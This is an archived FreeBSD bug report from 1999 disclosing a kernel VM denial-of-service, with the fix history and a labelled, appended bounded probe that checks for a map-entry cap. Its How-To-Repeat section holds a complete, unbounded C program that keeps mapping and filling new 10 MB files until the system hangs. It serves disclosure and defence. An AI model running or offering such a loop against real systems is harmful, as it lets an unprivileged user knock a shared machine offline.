From nobody@FreeBSD.ORG Sat Oct 30 16:00:46 1999
Return-Path: <nobody@FreeBSD.ORG>
Received: by hub.freebsd.org (Postfix, from userid 32767)
	id F0D8014BF2; Sat, 30 Oct 1999 16:00:45 -0700 (PDT)
Message-Id: <19991030230045.F0D8014BF2@hub.freebsd.org>
Date: Sat, 30 Oct 1999 16:00:45 -0700 (PDT)
From: sobomax@altavista.net
Sender: nobody@FreeBSD.ORG
To: freebsd-gnats-submit@freebsd.org
Subject: VM DoS attack (with exploit attached)
X-Send-Pr-Version: www-1.0

>Number:         14614
>Category:       kern
>Synopsis:       VM DoS attack (with exploit attached)
>Confidential:   no
>Severity:       critical
>Priority:       high
>Responsible:    dillon
>State:          closed
>Quarter:        
>Keywords:       
>Date-Required:  
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Sat Oct 30 16:10:00 PDT 1999
>Closed-Date:    Wed Mar 20 10:46:07 PST 2002
>Last-Modified:  Wed Mar 20 10:50:01 PST 2002
>Originator:     Maxim Sobolev
>Release:        4.0-CURRENT, 3.3-STABLE
>Organization:
Vega International Capital
>Environment:
>Description:
Any unprivileged user with shell access and 10-20MB of disk quota
can hang a FreeBSD machine using the following program. This program simply
mmap's large files without unmapping them. I have not found a way to
prevent this attack either using disk quotas or using memory limits in
login.conf.

I have personally tested that it works on 4.0; however, others report that 3.3
is also affected.
>How-To-Repeat:
#include <sys/types.h>
#include <sys/mman.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int
main(void)
{
    int fd;
    int i;
    int len = 1024*1024*10;  /* ie 10 Mbytes */
    caddr_t addr;
    char ttt[80];

    /* Create a fresh 10 MB file per iteration, map it MAP_SHARED and never unmap it. */
    for (i = 0; ; i++) {
        sprintf(ttt, "%d", i);
        fd = open(ttt, O_CREAT|O_RDWR, 0666);
        if (fd < 0) {
            printf("open error %d\n", errno);
            exit(1);
        }
        /* Extend the file to len bytes by writing one byte at the end. */
        lseek(fd, len-1, SEEK_SET);
        write(fd, "", 1);
        addr = mmap(0, len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
        if (addr == MAP_FAILED) {
            printf("mmap error %d\n", errno);
            exit(1);
        }
        close(fd);               /* the mapping outlives the descriptor */
        memset(addr, 'x', len);  /* touch every page so it is really backed */
    }
}

>Fix:


>Release-Note:
>Audit-Trail:
Responsible-Changed-From-To: freebsd-bugs->dillon 
Responsible-Changed-By: kris 
Responsible-Changed-When: Sun Jun 25 23:12:22 PDT 2000 
Responsible-Changed-Why:  
Verified this does do something nasty even with resource limits in 
place (I was seeing what seemed to be a held inode lock in the kernel). 
I also had pagedaemon going crazy when I ran this on an MFS. 

From: Hiten Pandya <hitmaster2k@yahoo.com>
To: bug-followup@FreeBSD.org
Cc: dillon@FreeBSD.org, sobomax@FreeBSD.org
Subject: Re: kern/14614: VM DoS attack (with exploit attached)
Date: Wed, 20 Mar 2002 07:36:12 -0800 (PST)

 Is this issue solved?
 
   -- Hiten
   -- <hiten@uk.FreeBSD.org>
 
State-Changed-From-To: open->closed 
State-Changed-By: dillon 
State-Changed-When: Wed Mar 20 10:44:45 PST 2002 
State-Changed-Why:  
This bug was fixed in Feb 2000 (2 years ago).  We now limit the number of 
tracking structures the kernel is able to allocate on behalf of any single 
process via the vm.max_proc_mmap sysctl. 

http://www.freebsd.org/cgi/query-pr.cgi?pr=14614 

From: Matthew Dillon <dillon@apollo.backplane.com>
To: Hiten Pandya <hitmaster2k@yahoo.com>
Cc: bug-followup@FreeBSD.ORG, sobomax@FreeBSD.ORG
Subject: Re: kern/14614: VM DoS attack (with exploit attached)
Date: Wed, 20 Mar 2002 10:45:03 -0800 (PST)

 :Is this issue solved?
 :
 :  -- Hiten
 :  -- <hiten@uk.FreeBSD.org>
 :
 
     I'll close the ticket.  It was fixed in February 2000 (two years ago).
     We now have a vm.max_proc_mmap sysctl that limits the number of 
     vm_map_entry structures the kernel is allowed to allocate on behalf of
     a process.
 
 					-Matt
 					Matthew Dillon 
 					<dillon@backplane.com>
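As an added example (not part of this PR or of FreeBSD's own code), a bounded C probe that checks whether a per-process cap on map entries, the mitigation Matt describes, is actually enforced on a host: it maps single pages until the kernel returns ENOMEM or a constructed ceiling is reached, then unmaps everything. The function name and the PROBE_CEILING value are assumptions; on Linux the analogous knob is vm.max_map_count.

```c
/* Added example, not from PR kern/14614: probe whether the kernel caps the number
 * of map entries one process may hold (vm.max_proc_mmap on FreeBSD, vm.max_map_count
 * on Linux).  Pages are mapped with alternating protections so adjacent entries
 * cannot be coalesced; the loop stops at ENOMEM or at a hard ceiling and unmaps all. */
#define _DEFAULT_SOURCE 1
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>

#define PROBE_CEILING 200000L   /* constructed safety cap: never map more than this */

/* Returns the number of page mappings obtained before the kernel refused one with
 * ENOMEM (below PROBE_CEILING means a cap is enforced), PROBE_CEILING if no
 * refusal happened, or -1 on an unexpected error. */
long probe_map_entry_cap(void)
{
    long pagesz = sysconf(_SC_PAGESIZE);
    void **maps = malloc(sizeof(void *) * PROBE_CEILING);
    long got = 0;
    int failed = 0;
    if (maps == NULL)
        return -1;
    while (got < PROBE_CEILING) {
        /* alternate PROT_READ / PROT_READ|PROT_WRITE so entries are not merged */
        int prot = (got & 1) ? PROT_READ : (PROT_READ | PROT_WRITE);
        void *p = mmap(NULL, pagesz, prot, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (p == MAP_FAILED) {
            failed = (errno != ENOMEM);   /* ENOMEM is the refusal we expect */
            break;
        }
        maps[got++] = p;
    }
    for (long i = 0; i < got; i++)        /* release every mapping we took */
        munmap(maps[i], pagesz);
    free(maps);
    return failed ? -1 : got;
}

int main(void)
{
    long n = probe_map_entry_cap();
    if (n < 0) {
        perror("mmap");
        return 1;
    }
    printf("%ld page mappings before refusal%s\n", n,
           n < PROBE_CEILING ? " (per-process cap enforced)" : " (ceiling hit, no cap seen)");
    return 0;
}
```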
>Unformatted:
